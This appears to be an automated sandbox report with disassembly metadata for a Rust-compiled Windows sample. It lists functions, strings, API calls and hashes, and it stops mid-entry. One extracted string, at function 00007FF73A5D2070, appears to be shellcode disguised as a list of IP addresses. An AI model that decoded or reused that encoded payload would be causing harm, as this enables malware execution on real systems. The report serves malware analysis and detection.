                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                          • API String ID: 1475443563-487299250
                                          • Opcode ID: 06edd6446ae722f7c196e3712d101c936da1beadda079ad2630bf9bc6185b362
                                          • Instruction ID: 54428e96fb398283f4430dcc778288d462ffa3b21930b24352238dfbd870f5eb
                                          • Opcode Fuzzy Hash: 06edd6446ae722f7c196e3712d101c936da1beadda079ad2630bf9bc6185b362
                                          • Instruction Fuzzy Hash: 5242576BE1C692F1F664AA1494163BAFB51AB53354FC042B5DABE06ED0DF3CE540E320
                                          Function 00007FF73A594DF0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 587COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899core\src\fmt\mod.rs
                                          • API String ID: 1475443563-2454368799
                                          • Opcode ID: fee08dd55581c5519c83eb913fb2a012764578172f400bbe9b6876b0cc660edb
                                          • Instruction ID: 9286ceba2ffed580af23ca46d117e292b0e03bb8419cf8438dc5190bfbfc9fc9
                                          • Opcode Fuzzy Hash: fee08dd55581c5519c83eb913fb2a012764578172f400bbe9b6876b0cc660edb
                                          • Instruction Fuzzy Hash: BF226826B182A166FB24DF259402FB9A751BB127A4FC05374DE6E4BBC0DF3CE615A310
                                          Function 00007FF73A5B95C0 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 426COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorHandleLast
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 2586478127-1397643090
                                          • Opcode ID: b31b5564bdbfb6f85fbc780bb1f21712b5d4f8444770ada3fd609d084e0f7cf4
                                          • Instruction ID: a6da5665c2ea0320739caaa8e04a98e8e08c3b5070e1e8e753ad31ece2ce25d4
                                          • Opcode Fuzzy Hash: b31b5564bdbfb6f85fbc780bb1f21712b5d4f8444770ada3fd609d084e0f7cf4
                                          • Instruction Fuzzy Hash: 47E1216AB0D782E6FA14AF65A4026B9E390FB46784FC04575EE1E13794DF3CE481E320
                                          Function 00007FF73A5D53E0 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 412COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: punycode{-}0
                                          • API String ID: 2221118986-2450133883
                                          • Opcode ID: 575d84887f0fb015ac62e41ad6e20fbd5207e6328db12b227a6f824d57c5f6bc
                                          • Instruction ID: 24a48001c121aeab6a696665791256c2c5072819e39467277d60f8a3e43d1bc5
                                          • Opcode Fuzzy Hash: 575d84887f0fb015ac62e41ad6e20fbd5207e6328db12b227a6f824d57c5f6bc
                                          • Instruction Fuzzy Hash: A9E1656BB1C64592FB209F15E4023BAB791BB96BC0F848171DE9D03B94EE3CE445E710
                                          Function 00007FF73A596650 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 402COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: punycode{-}0
                                          • API String ID: 2221118986-2450133883
                                          • Opcode ID: ef79e30b4b8cfde21d8624a00a3253746cfe560093d7076683369aa1493a51cb
                                          • Instruction ID: b62556a94df424400c468a57852ec81ef2cbff52339606592b91a1b6c1c509c3
                                          • Opcode Fuzzy Hash: ef79e30b4b8cfde21d8624a00a3253746cfe560093d7076683369aa1493a51cb
                                          • Instruction Fuzzy Hash: 5FE19966F0A68556FB209B25D845BF8A282FB4A7D4F808275CD1D0BFC4EF3CE509A310
                                          Function 00007FF73A59B590 Relevance: 3.3, Strings: 2, Instructions: 806COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,(><&*@$called `Result::unwrap()` on an `Err` value
                                          • API String ID: 0-898078177
                                          • Opcode ID: 684e07fd177a43f29813d91f5496d10b46cd09c7eae714947747212d992e3425
                                          • Instruction ID: c070e781dffca94eded1a94ba23080f110f9f3e1e139e779cab9f8886b9f73ef
                                          • Opcode Fuzzy Hash: 684e07fd177a43f29813d91f5496d10b46cd09c7eae714947747212d992e3425
                                          • Instruction Fuzzy Hash: 5062642AE1C69275FA24AB209406EBCB751AB17B94FC642B9D95D0F3D0DF3DE540E320
                                          Function 00007FF73A5D3AE0 Relevance: 3.3, Strings: 2, Instructions: 778COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value
                                          • API String ID: 0-1380848348
                                          • Opcode ID: dfe8aececf2d90f8c6956533a32bf12b5974a29f2e7fbad940f0f630b4e2571b
                                          • Instruction ID: 7d09195481be0d0ffeaf90329b3c2609125cc0571bd9493c70596652ebd449e1
                                          • Opcode Fuzzy Hash: dfe8aececf2d90f8c6956533a32bf12b5974a29f2e7fbad940f0f630b4e2571b
                                          • Instruction Fuzzy Hash: E352785BE1C69275FA64AA10A4077B9F7A1AB23781FC441B1DABD067D5CF3CE540B320
                                          Function 00007FF73A5CE670 Relevance: 2.9, APIs: 2, Instructions: 447COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmovememset
                                          • String ID:
                                          • API String ID: 1288253900-0
                                          • Opcode ID: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                          • Instruction ID: fe80c9ed38205dc0fed22375527bc6061d34430bd39a6adca8643bc5c651154a
                                          • Opcode Fuzzy Hash: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                          • Instruction Fuzzy Hash: 75028566D28FD941E223973968067FBAB10AFF7748F51E31BFEC931E15DB18A2419210
                                          Function 00007FF73A5DD3D0 Relevance: 2.9, APIs: 2, Instructions: 413COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.VCRUNTIME140(?,?,?,?,00000000,?,?,-00000008,?,00000000,00007FF73A5AD020), ref: 00007FF73A5DD898
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                          • Instruction ID: 94c68d61c725b6d2671f15728b12c6b4e0db72df5c4bbcf9ac28ba0dcb15c90d
                                          • Opcode Fuzzy Hash: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                          • Instruction Fuzzy Hash: 01F14557A0E6E195EA029B2D4002179BF60EB537A4F59C3B1DFB8177C2DA3DD146E320
                                          Function 00007FF73A5CFCD0 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 33333333$UUUUUUUU
                                          • API String ID: 0-3483174168
                                          • Opcode ID: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                          • Instruction ID: 9f65aa689f48d9da1cb3338e6f3165f74d93f4c1ad144cb72cf1e876bc014956
                                          • Opcode Fuzzy Hash: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                          • Instruction Fuzzy Hash: 2F91C783B581F003F7624B7D2D6656AEFA25406BD370DF452EED427A86C038CC2AE365
                                          Function 00007FF73A5D00F0 Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 33333333$UUUUUUUU
                                          • API String ID: 0-3483174168
                                          • Opcode ID: 394c0e031d85012aa99c547211958ac55519fdc23ec767107c687ad2c3f41526
                                          • Instruction ID: ea4d446fc81061f085101c1a00567688634e4e3d448364d1291719dfb932fb5e
                                          • Opcode Fuzzy Hash: 394c0e031d85012aa99c547211958ac55519fdc23ec767107c687ad2c3f41526
                                          • Instruction Fuzzy Hash: 5291728331A7D48FAB52C7BE1C44D8A5ED1906AFC836CF06DDE882B722D026D553D362
                                          Function 00007FF73A59E349 Relevance: 1.8, APIs: 1, Instructions: 556COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7a57c6d56c9da48ac59047e24bc76c30fded5785c54a955f60598b6f1a215bd
                                          • Instruction ID: 52649213f2d2609931895726c63d098af9524432a3ccab9f5988b0dc663424b8
                                          • Opcode Fuzzy Hash: b7a57c6d56c9da48ac59047e24bc76c30fded5785c54a955f60598b6f1a215bd
                                          • Instruction Fuzzy Hash: 9132B23AA49BC5A8FB719F65D806BF963A1FB16748F840179CE4D0B795DF389280D310
                                          Function 00007FF73A5AB040 Relevance: 1.6, APIs: 1, Instructions: 373COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID:
                                          • API String ID: 1475443563-0
                                          • Opcode ID: 2d1d7c1fa21308e76673b769433ff5a6a86d04fdd991a3fafc81192d3dd7d429
                                          • Instruction ID: 5ff1bd136f86b9f41e930c7e076b5ad13595668d0eee8a9ea949b5002336cdaf
                                          • Opcode Fuzzy Hash: 2d1d7c1fa21308e76673b769433ff5a6a86d04fdd991a3fafc81192d3dd7d429
                                          • Instruction Fuzzy Hash: A7C17C26B2D6A462FA16DB219815FBAB641FB12B90FC18271DD0E03BC0DF3CF951A350
                                          Function 00007FF73A5C1CD0 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
                                          Download Yara Rule
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5C200C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 0-1397643090
                                          • Opcode ID: a153d17e15eddb3ec664ccb0b5ca4a750dc0fffd2ff6139d32a9c92541f171bd
                                          • Instruction ID: 6acda37bc85bf98b193323bed8a5d9b847e1f26b5968819428320b520a0dec77
                                          • Opcode Fuzzy Hash: a153d17e15eddb3ec664ccb0b5ca4a750dc0fffd2ff6139d32a9c92541f171bd
                                          • Instruction Fuzzy Hash: DBD1585AD0C6D664F725AA6484027B9FA91AB03760FC493B1CAAD272D4DB7C5982F330
                                          Function 00007FF73A5C0120 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                          Download Yara Rule
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5C05D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 0-1397643090
                                          • Opcode ID: 914b1cc12458c5de67c234433f00c6b7f588dcfd756fb1079c660e761476398f
                                          • Instruction ID: 6aee4408f650d8511f1e0afb2e80ce3f1ebabdc38b272ca57c2865a85dde6e27
                                          • Opcode Fuzzy Hash: 914b1cc12458c5de67c234433f00c6b7f588dcfd756fb1079c660e761476398f
                                          • Instruction Fuzzy Hash: E9C1285BA1CA5252FA656715E04223EE7A1FF52790F809171EEEF037D8EE7CE540A230
                                          Function 00007FF73A5D2070 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                          Download Yara Rule
                                          Strings
                                          • 252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102.129.1, xrefs: 00007FF73A5D2073
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102.129.1
                                          • API String ID: 0-2093531773
                                          • Opcode ID: 2262c8717533af80948bc42ec499b92e200691f0da3c35e4096c8360c6a83219
                                          • Instruction ID: 45ff68e366987809c1e126dccdbd08ce7931ce2151544deaac1c622483000ad6
                                          • Opcode Fuzzy Hash: 2262c8717533af80948bc42ec499b92e200691f0da3c35e4096c8360c6a83219
                                          • Instruction Fuzzy Hash: DAB15D7BF0866255F728AA6554032BDB6A1AB46764F444275EEBE177C8CF3CD042E330
                                          Function 00007FF73A5A7A80 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                          Download Yara Rule
                                          Strings
                                          • library\core\src\fmt\mod.rscalled `Option::unwrap()` on a `None` valuefrom_str_radix_int: must lie in the range `[2, 36]` - found , xrefs: 00007FF73A5A7E2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: library\core\src\fmt\mod.rscalled `Option::unwrap()` on a `None` valuefrom_str_radix_int: must lie in the range `[2, 36]` - found
                                          • API String ID: 0-1636582954
                                          • Opcode ID: 6d403d95b1cbf906573c8f356343c9e9fb67c9384695b2faf11a329c70a8f630
                                          • Instruction ID: ebc3818a59be7dcd4344bfa49bfdac89cda455b8fff59a81a0c3a39f357b8a6e
                                          • Opcode Fuzzy Hash: 6d403d95b1cbf906573c8f356343c9e9fb67c9384695b2faf11a329c70a8f630
                                          • Instruction Fuzzy Hash: 8A912537B0975A62FB12AB359901279B695BB17B84F988870CE5D833D0EE3DD842E310
                                          Function 00007FF73A5AE1E0 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                          Download Yara Rule
                                          Strings
                                          • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF73A5AE555, 00007FF73A5AE56F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                          • API String ID: 0-3238246840
                                          • Opcode ID: 4c414875b772b2f110fccbe79656a8cd303bf58546a9a8804509ca458692072b
                                          • Instruction ID: d91b736c12bb66695442dc67e4cc59c8cc2c399fce7eabe67fd6b95b2d07c17a
                                          • Opcode Fuzzy Hash: 4c414875b772b2f110fccbe79656a8cd303bf58546a9a8804509ca458692072b
                                          • Instruction Fuzzy Hash: CFA103AAB09791A1FF129B25E4457B9ABA1BB96B94F88C571CE1D077C0DF3CE041D310
                                          Function 00007FF73A5C9A10 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                          Download Yara Rule
                                          APIs
                                          • BCryptGenRandom.BCRYPT(?,?,?,?,?,?,00007FF73A5CD01D,?,?,?,00007FF73A5ACFEC), ref: 00007FF73A5C9A2F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CryptRandom
                                          • String ID:
                                          • API String ID: 2662593985-0
                                          • Opcode ID: 54752a9fc5ee2aae3f98d8f55c54276821d44edc7fd45214e6146ac58af48cc3
                                          • Instruction ID: 57a3de95384bc4c90c8b09ef18d059303840a65494bb2f3e312d7c842abe4186
                                          • Opcode Fuzzy Hash: 54752a9fc5ee2aae3f98d8f55c54276821d44edc7fd45214e6146ac58af48cc3
                                          • Instruction Fuzzy Hash: 3BE02614B080C1D2FA20272AE40329A9760BF89B8CFC04161EE8C02214DE1CD3818B20
                                          Function 00007FF73A5940F0 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
